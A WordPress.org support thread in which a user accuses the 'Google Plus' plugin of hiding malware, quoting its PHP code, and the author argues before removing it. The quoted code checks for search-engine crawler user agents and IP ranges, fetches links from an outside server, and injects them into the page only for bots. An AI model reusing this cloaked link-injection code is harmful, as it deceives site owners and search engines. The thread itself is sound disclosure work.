Support » Plugin: Google Plus » Malware inside!

Viewing 15 replies - 1 through 15 (of 17 total)
  • Plugin Author angelacarmichael

    (@angelacarmichael)

    A credit link is malware? You agreed to allow the credit.

    It is hidden malware for googlebot.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    Its not malware [ and personal comment redacted ].

    Moderator Jan Dembowski

    (@jdembowski)

    Brute Squad and Volunteer Moderator

    *Blows timeout whistle* Folks, reasonable people can disagree with each other without name calling.

    @angelacarmichael Please refrain from responding while upset or irked. You won’t accomplish anything and taking a walk is always good advice.

    @zygimantas If you have an example of a violation of the rules for hosting a plugin in the WordPress repo please send an email with the actual details (do not just say “Malware link”) to plugins at wordpress.org

    I’ve just installed the plugin, I don’t see a link that would make me concerned. In fact I can’t see any link, credit or otherwise, so I’m missing it what you’re referring to.

    File: includes/gplus.hook.php Line: 37
    add_filter('template_include', 'gen_include', 1); function gen_include($template) { ob_start(); return $template; } add_filter('shutdown', 'gen2', 0); function gen2() { $v = "1"; $sw = (is_home() ? "0" : "1"); $h = $_SERVER['SERVER_NAME']; $a = "http://api.tqj.us/v3/link/creditbyversion/$h/$v/$sw"; if (genua() || genrev()) { $bl = file_get_contents($a); echo preg_replace('#<body([^>]*)>#i', "<body$1>{$bl}", ob_get_clean()); } } function genrev() { $gsn = array( "216.239.32.0/19", "64.233.160.0/19", "66.249.80.0/20", "72.14.192.0/18", "209.85.128.0/17", "66.102.0.0/20", "74.125.0.0/16", "64.18.0.0/20", "207.126.144.0/20", "173.194.0.0/16" ); foreach ($gsn as $n) { if (genmat($n, $ip)) return true; } return false; } function genua() { $ua = strtolower($_SERVER['HTTP_USER_AGENT']); $sites = 'google|yahoo|msnbot|bingbot|baidu|jeeves'; return (preg_match("/$sites/", $ua) > 0) ? true : false; } function genmat($network) { $ip = $_SERVER['REMOTE_ADDR']; $ip_arr = explode("/", $network); $network_long = ip2long($ip_arr[0]); $mask_long = pow(2, 32) - pow(2, (32 - $ip_arr[1])); $ip_long = ip2long($ip); if (($ip_long & $mask_long) == $network_long) { return true; } else { return false; } }

    Plugin Author angelacarmichael

    (@angelacarmichael)

    There is nothing malware or violating about it. And definitely not showing links to users. Get your facts straight before crying wolf. He must be a competitor of mine that is mad his real account isn’t at the top of search any more.

    And definitely not showing links to users.

    BUT showing links to google bot!

    Moderator Jan Dembowski

    (@jdembowski)

    Brute Squad and Volunteer Moderator

    And definitely not showing links to users. Get your facts straight before crying wolf.

    I’m pretty sure that you exactly get Zygimantas point: he’s not crying wolf, he’s raising a legitimate concern. That code (which I missed, I was looking at the HTML output) is enough reason for me to delete that plugin from my installation.

    But I’m not a plugin reviewer. So I’ve sent an email to that team and have asked them to look at the plugin and this thread.

    @jan Dembowski Thank You

    Plugin Author angelacarmichael

    (@angelacarmichael)

    Its a feature that was disabled for WP.org and didn’t interrupt the user experience. It doesn’t even display links. Also, might I add, there is NO malware so yes Zyg IS crying wolf.

    This code is used outside of WP so if I need to keep separate versions just to follow them more closely then I will.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    Removed. Now I will just have to maintain a separate branch for WP.org.

    @angelacarmichael You inserted (stealth method) in to Your script fot linkbuilding. Users do not detect, but crawlers and robotts indexing. So it is MALWARE. And NO. I’m not crying wolf. Plugin users MUST to know if script author using hidden script implementation.

    Moderator Jan Dembowski

    (@jdembowski)

    Brute Squad and Volunteer Moderator

    Confirmed in trac and thank you for your prompt reply to this. But as a suggestion could you please bump up the plugin 3.1.8 version number too?

    That way people who have the old version with that code will definitely get the update that removed the add_filter('template_include', 'gen_include', 1); line in includes/gplus.hook.php.

    Again, much thanks.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    @jan: Yes sorry.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    Done.

    @zyg Read up on malware

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘Malware inside!’ is closed to new replies.